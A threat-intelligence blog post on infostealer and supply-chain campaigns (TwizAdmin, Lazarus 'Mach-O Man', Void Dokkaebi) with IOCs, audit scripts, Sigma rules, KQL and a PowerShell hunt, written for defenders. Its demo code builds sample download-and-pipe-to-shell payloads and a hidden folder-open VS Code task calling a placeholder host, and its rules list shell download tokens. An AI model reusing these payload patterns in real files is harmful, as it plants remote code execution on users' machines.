
TwizAdmin, Mach-O Man & Void Dokkaebi: Multi-Platform Infostealer Surge & Supply Chain Attacks — OTX Pulse Analysis

Security Arsenal Team
April 23, 2026
6 min read

Threat Summary

Recent OTX pulses indicate a convergence of state-sponsored activity and Cybercrime-as-a-Service (CaaS) targeting credential stores and cryptocurrency assets. We are observing active campaigns from Lazarus Group (Mach-O Man), Void Dokkaebi (supply chain), and the DataBreachPlus actor (TwizAdmin). These adversaries have shifted focus to multi-platform payloads (Windows/macOS), utilizing social engineering vectors like "ClickFix" fake CAPTCHAs and fake job interviews to bypass traditional perimeter defenses. The primary objective is systematic credential harvesting from browsers, development environments, and crypto wallets to enable financial theft and lateral movement.

Threat Actor / Malware Profile

TwizAdmin (DataBreachPlus)

  • Type: MaaS (Malware-as-a-Service).
  • Malware: TwizAdmin (Clipper/Stealer), crpx0 (Ransomware).
  • Behavior: Multi-stage attack featuring a FastAPI-based C2 panel. It hijacks clipboards for 8 crypto chains, steals BIP-39 seed phrases, and exfiltrates browser data. Includes a ransomware module for extortion if monetization fails.
  • Distribution: Phishing lures impersonating logistics (FedEx) and software delivery.

Mach-O Man (Lazarus Group)

  • Type: APT / Espionage.
  • Malware: PyLangGhostRAT, Mach-O Man loader.
  • Behavior: Targets macOS users via "ClickFix". Fake Zoom/Teams meeting invitations delivered over Telegram lead to a page that instructs the user to paste a terminal command; that command downloads and executes the loader, and collected data is exfiltrated via Telegram.
  • Persistence: Installs a LaunchAgent and modifies the user's shell startup scripts so the payload survives reboots.
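The LaunchAgent persistence described above is the easiest artifact to audit at scale. The script below is an added example, not code from the pulse analysis or from any of the actors' tooling: it parses every plist under the standard LaunchAgent directories and flags agents whose ProgramArguments execute from temporary paths, pipe a download into a shell, or combine RunAtLoad with KeepAlive. The indicator lists are assumptions to tune per fleet, and the sample plists written by `demo()` are constructed, not real IOCs.

```python
"""Audit macOS LaunchAgents for ClickFix-style persistence.

Added example (not from the original pulse analysis). Heuristics and the
sample plists are constructed here; tune the indicator lists to your fleet.
"""
import os
import plistlib
import tempfile
from pathlib import Path

# Paths ClickFix one-liners tend to drop payloads into; legitimate agents rarely run from them.
# "/." catches hidden directories (e.g. ~/.something/), which is noisy but worth a look.
SUSPICIOUS_PATH_FRAGMENTS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/", "/.")
# Download/decode/interpreter tokens in ProgramArguments are a strong signal on their own.
SUSPICIOUS_TOKENS = ("curl ", "base64", "osascript", "sh -c", "bash -c", "zsh -c",
                     "python3 -c", "nohup", "| sh", "| bash")

LAUNCH_AGENT_DIRS = (
    Path.home() / "Library" / "LaunchAgents",
    Path("/Library/LaunchAgents"),
)


def score_plist(plist: dict) -> list[str]:
    """Return reasons the LaunchAgent looks like ClickFix persistence (empty list if benign)."""
    reasons = []
    args = list(plist.get("ProgramArguments") or [])
    if plist.get("Program"):
        args = [plist["Program"]] + args
    cmdline = " ".join(str(a) for a in args)
    if any(frag in cmdline for frag in SUSPICIOUS_PATH_FRAGMENTS):
        reasons.append("executes from a temporary or hidden path")
    if any(tok in cmdline for tok in SUSPICIOUS_TOKENS):
        reasons.append("shell/download interpreter in ProgramArguments")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive (restart on kill)")
    if plist.get("StartInterval") and plist["StartInterval"] < 300:
        reasons.append("polls every %ss" % plist["StartInterval"])
    return reasons


def audit_launch_agents(dirs=LAUNCH_AGENT_DIRS) -> dict[str, list[str]]:
    """Parse every .plist in the given directories; map path -> reasons for the suspicious ones."""
    findings = {}
    for d in dirs:
        if not Path(d).is_dir():
            continue
        for p in sorted(Path(d).glob("*.plist")):
            try:
                with open(p, "rb") as fh:
                    plist = plistlib.load(fh)
            except Exception as exc:  # a malformed plist in this directory is itself worth a look
                findings[str(p)] = [f"unparseable plist: {exc}"]
                continue
            reasons = score_plist(plist)
            if reasons:
                findings[str(p)] = reasons
    return findings


def demo() -> dict[str, list[str]]:
    """Write a constructed malicious agent and a benign one into a temp dir and audit it."""
    tmp = Path(tempfile.mkdtemp())
    malicious = {
        "Label": "com.zoom.update",  # constructed lookalike label, not a real IOC
        "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://example.invalid/x | base64 -d | sh"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }
    benign = {
        "Label": "com.example.backup",
        "ProgramArguments": ["/usr/local/bin/backup", "--daily"],
        "RunAtLoad": True,
    }
    for name, data in (("com.zoom.update.plist", malicious), ("com.example.backup.plist", benign)):
        with open(tmp / name, "wb") as fh:
            plistlib.dump(data, fh)
    return audit_launch_agents([tmp])


if __name__ == "__main__":
    results = demo() if os.environ.get("DEMO") else audit_launch_agents()
    for path, reasons in results.items():
        print(path)
        for r in reasons:
            print("   -", r)
```

Run it with `DEMO=1` to see the constructed sample, or without to audit the live machine; pair the output with `launchctl list` to confirm which flagged agents are actually loaded.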

Void Dokkaebi (Famous Chollima)

  • Type: Supply Chain / Dev-targeted.
  • Malware: DEV#POPPER RAT, InvisibleFerret, OmniStealer.
  • Behavior: Poisons public Git repositories, using a fake job interview "coding test" as the lure to get the developer to clone them. A malicious task in the repository's `.vscode/tasks.json` abuses VS Code workspace trust: once the developer trusts the cloned folder, the task configured to run on folder open executes the payload without any further click. Self-propagating via Git history tampering.
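Because the execution primitive here is a task definition rather than a binary, the check a developer-workstation audit most needs is a scan of every cloned repository for tasks that auto-run on folder open or that embed download/eval commands. The scanner below is an added example (not the pulse's or the actors' code): it tolerates VS Code's JSON-with-comments format, walks a source tree for `.vscode/tasks.json`, and flags `runOptions.runOn: folderOpen` and suspicious command tokens. The token list is an assumption; `demo()` writes a constructed sample repository, not a real lure.

```python
"""Find VS Code tasks that auto-run when a cloned folder is opened.

Added example (not from the original pulse analysis). The sample repository
layout and task definitions are constructed inline; the token list is an assumption.
"""
import json
import re
import sys
import tempfile
from pathlib import Path

AUTO_RUN = "folderOpen"  # runOptions.runOn value that fires a task when the workspace opens
# Download/eval tokens a build task has no business containing.
SUSPICIOUS = ("curl ", "wget ", "Invoke-WebRequest", "iwr ", "DownloadString", "base64",
              "-enc ", "node -e", "python -c", "eval(", "| sh", "| bash", "iex ")


def _load_jsonc(path: Path):
    """tasks.json is JSON-with-comments: strip // and /* */ comments and trailing commas, then parse."""
    text = path.read_text(encoding="utf-8", errors="replace")
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"(?m)^\s*//.*$", "", text)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def task_command_string(task: dict) -> str:
    """Flatten command + args, including per-OS overrides, into one searchable string."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    for os_key in ("windows", "linux", "osx"):
        sub = task.get(os_key) or {}
        parts.append(str(sub.get("command", "")))
        parts.extend(str(a) for a in sub.get("args", []))
    return " ".join(parts)


def audit_repo(repo: Path) -> list[dict]:
    """Return one finding per task that auto-runs on folder open or embeds download/eval tokens."""
    tasks_file = repo / ".vscode" / "tasks.json"
    if not tasks_file.is_file():
        return []
    try:
        doc = _load_jsonc(tasks_file)
    except ValueError as exc:
        return [{"file": str(tasks_file), "label": None, "reasons": [f"unparseable: {exc}"]}]
    findings = []
    for task in doc.get("tasks", []):
        reasons = []
        if (task.get("runOptions") or {}).get("runOn") == AUTO_RUN:
            reasons.append("runOptions.runOn=folderOpen (executes once the workspace is trusted and opened)")
        cmd = task_command_string(task)
        hits = [t for t in SUSPICIOUS if t in cmd]
        if hits:
            reasons.append("suspicious command tokens: " + ", ".join(sorted(hits)))
        if reasons:
            findings.append({"file": str(tasks_file), "label": task.get("label"), "reasons": reasons})
    return findings


def audit_tree(root: Path) -> list[dict]:
    """Audit every checkout under root (e.g. ~/src) that carries a .vscode/tasks.json."""
    findings = []
    for tasks_file in root.rglob(".vscode/tasks.json"):
        findings.extend(audit_repo(tasks_file.parent.parent))
    return findings


def demo() -> list[dict]:
    """Constructed sample repo: a benign build task next to a hidden folder-open downloader."""
    root = Path(tempfile.mkdtemp())
    vscode = root / "interview-task" / ".vscode"
    vscode.mkdir(parents=True)
    (vscode / "tasks.json").write_text("""{
  // constructed sample, not a real lure
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    { "label": "prepare env", "type": "shell",
      "command": "node -e \\"require('child_process').exec('curl -s http://example.invalid/s | sh')\\"",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    },
  ]
}""", encoding="utf-8")
    return audit_tree(root)


if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    for f in (audit_tree(target) if target else demo()):
        print(f["file"], f["label"], *f["reasons"], sep="\n   ")
```

Pass a source root as the first argument to scan real checkouts. A hit on `runOn: folderOpen` in a repository the developer did not author is the thing to escalate; a `"reveal": "never"` presentation setting next to it, as in the constructed sample, means the task output was deliberately hidden from the terminal panel.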

StepDrainer

  • Type: Web3 MaaS.
  • Behavior: Smart contract drainer abusing ERC-20 approvals (approve/permit signatures) and NFT setApprovalForAll grants to move assets without needing the victim's private key. Delivered via phishing sites mimicking blockchain scanners.

IOC Analysis

The provided indicators reveal a hybrid infrastructure strategy:

  • C2 Infrastructure: IPs like 103.241.66[.]238 (TwizAdmin) and 166.88.4[.]2 (Void Dokkaebi) serve as direct command and control nodes.
  • Delivery Infrastructure: Numerous domains utilizing .xyz (e.g., fanonlyatn[.]xyz) and .fun TLDs (e.g., bull-run[.]fun) host the malicious payloads or act as redirectors for ClickFix campaigns.
  • Payloads: A mix of SHA256 and MD5 hashes corresponding to Mach-O binaries (macOS), Python scripts (PyLangGhostRAT), and Windows loaders.
  • Operationalization: SOC teams should immediately block the listed IPs and domains at the perimeter. File hashes should be uploaded to EDR threat feeds for retrospective hunting. Note the use of non-standard ports (e.g., 1337) for C2 communication.
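Before the indicators above can be matched against telemetry they have to be refanged, and domain matching has to catch subdomains (`cdn.bull-run.fun`) without catching lookalike suffixes (`bull-run.fun.example.com`). The matcher below is an added example, not part of the original analysis: it normalises the page's IOC values, matches them against a constructed set of connection records, and records whether the non-standard port 1337 was used without requiring it. The record layout and the sample connections are assumptions.

```python
"""Refang the pulse IOCs and match them against connection records.

Added example (not part of the original analysis). The IOC values are the ones
listed on this page; the connection records in SAMPLE are constructed.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional

# As published: a mix of defanged and plain forms.
C2_IPS = ["103.241.66[.]238", "166.88.4.2", "31.31.198.206", "85.239.62.36", "23.27.20.143", "172.94.9.250"]
DELIVERY_DOMAINS = ["fanonlyatn[.]xyz", "bull-run[.]fun", "spot-wave.fun", "livemicrosft.com", "moonscan.live", "scanclaw.live"]
C2_PORT = 1337  # observed TwizAdmin C2 port; informational, never a precondition for a hit


def refang(ioc: str) -> str:
    """Undo the usual defanging conventions so IOCs compare equal to raw telemetry."""
    ioc = ioc.strip().lower()
    ioc = ioc.replace("[.]", ".").replace("(.)", ".").replace("{.}", ".")
    ioc = re.sub(r"^hxxps?://", lambda m: m.group(0).replace("hxxp", "http"), ioc)
    return ioc


IP_SET = {ipaddress.ip_address(refang(i)) for i in C2_IPS}
DOMAIN_SET = {refang(d) for d in DELIVERY_DOMAINS}


def domain_matches(host: str) -> Optional[str]:
    """Exact or parent-domain match on label boundaries; a lookalike suffix never matches."""
    labels = refang(host).rstrip(".").split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in DOMAIN_SET:
            return candidate
    return None


@dataclass
class Conn:
    device: str
    process: str
    remote_host: str  # empty when only an IP was logged
    remote_ip: str
    remote_port: int


def classify(conn: Conn) -> Optional[dict]:
    """Return a hit describing which IOC matched, or None. IP equality, never prefix matching."""
    try:
        ip = ipaddress.ip_address(conn.remote_ip)
    except ValueError:
        ip = None
    kind, ioc = None, None
    if ip is not None and ip in IP_SET:
        kind, ioc = "c2_ip", str(ip)
    elif conn.remote_host:
        hit = domain_matches(conn.remote_host)
        if hit:
            kind, ioc = "delivery_domain", hit
    if kind is None:
        return None
    return {"device": conn.device, "process": conn.process, "kind": kind,
            "ioc": ioc, "c2_port": conn.remote_port == C2_PORT}


def hunt(conns) -> list[dict]:
    return [h for h in (classify(c) for c in conns) if h]


# Constructed sample telemetry (not from any real environment).
SAMPLE = [
    Conn("ws-dev-01", "node.exe", "", "166.88.4.2", 443),
    Conn("ws-fin-07", "python.exe", "", "103.241.66.238", 1337),
    Conn("mac-ops-03", "curl", "cdn.bull-run.fun", "198.51.100.7", 443),
    Conn("ws-hr-02", "chrome.exe", "bull-run.fun.example.com", "198.51.100.8", 443),  # lookalike suffix
    Conn("ws-hr-02", "chrome.exe", "www.microsoft.com", "203.0.113.5", 443),
    Conn("ws-dev-01", "git.exe", "", "103.241.66.23", 22),  # shares a prefix with a C2 IP only
]

if __name__ == "__main__":
    for h in hunt(SAMPLE):
        print(h)
```

The last two sample records are the caveats: substring or prefix matching on IP strings (`'103.241.66.'`) would have flagged the git connection, and naive `endswith` on hostnames would have flagged the lookalike. Feed real records into `hunt()` from whatever exports your proxy or EDR produces.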

Detection Engineering

YAML
title: Potential macOS ClickFix Fake Meeting Invite
id: 7a2c9d1e-8f3b-4c1d-a0e5-9b2c3d4e5f6a
status: experimental
description: Detects a shell, curl or osascript command line that both references a meeting platform (the lure) and contains a download-and-execute or decode pattern (the ClickFix payload). The meeting keywords alone are far too noisy; a bare 'curl https://zoom.us/...' would fire.
references:
    - https://otx.alienvault.com/pulse/66279a0f1d0d0a5f0c5b1b1b
author: Security Arsenal Research
date: 2026/04/24
modified: 2026/04/24
logsource:
    category: process_creation
    product: macos
detection:
    selection_image:
        Image|endswith:
            - '/osascript'
            - '/bash'
            - '/zsh'
            - '/sh'
            - '/curl'
    selection_lure:
        CommandLine|contains:
            - 'meeting'
            - 'teams'
            - 'zoom'
            - 'googlemeet'
            - 'meet.google'
    selection_clickfix:
        CommandLine|contains:
            - 'curl '
            - 'base64'
            - '| sh'
            - '| bash'
            - '| zsh'
            - 'osascript -e'
            - 'nohup '
            - 'chmod +x'
    condition: all of selection_*
falsepositives:
    - Administrators scripting meeting-client installs from the terminal; tune selection_lure to your environment
level: high
tags:
    - attack.execution
    - attack.t1059.002
    - attack.t1059.004
    - attack.t1204.004
---
title: Suspicious VS Code Git Repository Execution
id: 8b3d0e2f-9g4c-5d2e-b1f6-0c3d4e5f6g7a
status: experimental
description: Detects VS Code (or git) spawning a shell or interpreter whose command line downloads or decodes content, the behaviour of a malicious tasks.json entry that auto-runs once a cloned repository is opened and trusted. Network indicators are deliberately not in this rule; process_creation events carry no DestinationIp field, so a rule requiring both would never match. Use the network rule and the KQL query below for the IP set.
references:
    - https://otx.alienvault.com/pulse/66266e5c1d0d0a5f0c5b1b1a
author: Security Arsenal Research
date: 2026/04/24
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\Code.exe'
            - '\git.exe'
    selection_child:
        Image|endswith:
            - '\node.exe'
            - '\python.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
    selection_cmdline:
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'iwr '
            - 'DownloadString'
            - 'DownloadFile'
            - 'curl '
            - 'FromBase64String'
            - '-EncodedCommand'
            - ' -enc '
            - 'child_process'
            - 'urllib'
    condition: all of selection_*
falsepositives:
    - Build tasks in known internal repositories that legitimately fetch dependencies with curl or Invoke-WebRequest; baseline them before enabling
level: high
tags:
    - attack.initial_access
    - attack.execution
    - attack.t1195.002
    - attack.t1204.002
---
title: TwizAdmin C2 Network Traffic
id: 9c4e1f3g-0h5d-6e3f-c2g7-1d4e5f6g7h8a
status: experimental
description: Detects any outbound connection to known TwizAdmin C2 addresses. The IP match alone is the hit; the non-standard port 1337 observed in the pulse is worth noting in triage but is not required, because the operator can move ports without changing infrastructure.
references:
    - https://otx.alienvault.com/pulse/66263d581d0d0a5f0c5b1b19
author: Security Arsenal Research
date: 2026/04/24
logsource:
    category: network_connection
detection:
    selection_c2_ip:
        DestinationIp:
            - '103.241.66.238'
            - '31.31.198.206'
            - '85.239.62.36'
    condition: selection_c2_ip
falsepositives:
    - Unlikely
level: critical
tags:
    - attack.command_and_control
    - attack.t1071.001
    - attack.t1571


kql
// Hunt for Void Dokkaebi and TwizAdmin Infrastructure Connections
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in~ ("fanonlyatn.xyz", "bull-run.fun", "spot-wave.fun", "livemicrosft.com", "moonscan.live", "scanclaw.live") 
   or RemoteIP in ("103.241.66.238", "31.31.198.206", "166.88.4.2", "85.239.62.36", "23.27.20.143", "172.94.9.250")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
| order by Timestamp desc


powershell
# IOC Hunt Script for TwizAdmin and Mach-O Man File Hashes (Windows endpoints)
# Indicators are split by algorithm so each file is hashed only with the algorithms that
# have indicators. PowerShell's -contains comparison is case-insensitive, so the upper-case
# output of Get-FileHash matches the lower-case indicators below.
$Sha256Targets = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9",
    "7fd19c564761e2c8c9b583cf30db810e313417c7d3572f637f8cedf4d2cc1e91"
)
$Md5Targets = @(
    "e12285f507c847b986233991b86b22e3"
)

$SearchPaths = @("C:\Users\*\Downloads\", "C:\Temp\", "C:\ProgramData\", "C:\Users\*\AppData\Local\Temp\")

Write-Host "Scanning for malicious file hashes associated with TwizAdmin and Mach-O Man..." -ForegroundColor Yellow

foreach ($Path in $SearchPaths) {
    # -File skips directories (Get-FileHash cannot hash them); the wildcard expands per user profile
    Get-ChildItem -Path $Path -File -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        $File = $_
        $Sha256 = (Get-FileHash -LiteralPath $File.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($Sha256 -and $Sha256Targets -contains $Sha256) {
            Write-Host "[ALERT] Malicious file found (SHA256 $Sha256): $($File.FullName)" -ForegroundColor Red
        }
        # One indicator is MD5-only, so every file also gets an MD5 pass
        $Md5 = (Get-FileHash -LiteralPath $File.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if ($Md5 -and $Md5Targets -contains $Md5) {
            Write-Host "[ALERT] Malicious file found (MD5 $Md5): $($File.FullName)" -ForegroundColor Red
        }
    }
}

# Check for connections to C2 IPs in any TCP state (a SynSent to a dead C2 is still a beacon attempt).
# Get-NetTCPConnection filters on RemoteAddress itself, so no manual loop comparison is needed.
$C2IPs = @("103.241.66.238", "166.88.4.2", "172.94.9.250", "31.31.198.206", "85.239.62.36", "23.27.20.143")
$Connections = Get-NetTCPConnection -RemoteAddress $C2IPs -ErrorAction SilentlyContinue
foreach ($Conn in $Connections) {
    $Process = Get-Process -Id $Conn.OwningProcess -ErrorAction SilentlyContinue
    Write-Host "[ALERT] C2 connection ($($Conn.State)) to $($Conn.RemoteAddress):$($Conn.RemotePort) by process: $($Process.ProcessName) (PID $($Conn.OwningProcess))" -ForegroundColor Red
}

Response Priorities

Immediate

  • Block IOCs: Implement blocks on all listed IPs (TwizAdmin, Void Dokkaebi) and domains (fanonlyatn[.]xyz, bull-run[.]fun, livemicrosft[.]com) on firewalls and secure web gateways.
  • Hunt for Execution: Run the provided PowerShell script across Windows endpoints to detect dropped .exe/.js payloads in temp and download folders. The script does not run on macOS; there, hash candidates in ~/Downloads and /tmp with `shasum -a 256` and compare against the listed Mach-O hashes.
  • Quarantine: Isolate any device showing a connection to 103.241.66[.]238 or 166.88.4[.]2.

24 Hours

  • Credential Reset: If credential theft is suspected (based on infostealer presence), force a password reset for affected users and revoke active session tokens and refresh tokens; stolen browser cookies bypass the password change otherwise.
  • Developer Hygiene: Audit developer workstations for unauthorized git clones, `.vscode/tasks.json` entries that run on folder open, and unexpected VS Code extensions. Rotate SSH keys and API tokens that may have been stolen by OmniStealer/BeaverTail.
  • Crypto Wallet Audit: Review token approvals on organisational wallets and revoke allowances granted to unknown contracts (StepDrainer); verify recently pasted destination addresses against intended recipients (TwizAdmin clipper).

1 Week

  • Application Control: Implement strict code signing policies for macOS devices to prevent execution of unsigned Mach-O binaries.
  • Supply Chain Vetting: Review policies regarding third-party code repositories and job recruitment processes to mitigate Void Dokkaebi-style attacks.
  • Hardening: Enforce browser extension allowlisting to limit the wallet and password-manager extensions whose stored data these infostealers harvest.


Tags: darkweb, otx-pulse, darkweb-credentials, infostealer, twizadmin, mach-o-man, lazarus-group, supply-chain-attack
